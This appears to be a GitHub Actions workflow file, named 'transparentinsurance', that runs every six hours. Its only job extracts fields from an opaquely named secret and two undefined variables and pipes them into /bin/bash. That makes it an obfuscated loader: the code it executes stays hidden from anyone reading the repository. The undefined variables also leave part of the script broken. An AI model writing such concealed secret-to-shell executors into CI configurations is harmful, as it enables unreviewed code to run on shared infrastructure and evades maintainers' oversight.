name: transparentinsurance
on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: transparentinsurance
        env:
          oaszk031: ${{ secrets.oaszk031 }}
        run: |
          echo $oaszk031 | jq -r .n9331 | /bin/bash
          echo $lalzr74942 | jq -r .mavs253 | /bin/bash
          echo $ar1 | jq -r .m8 | /bin/bash

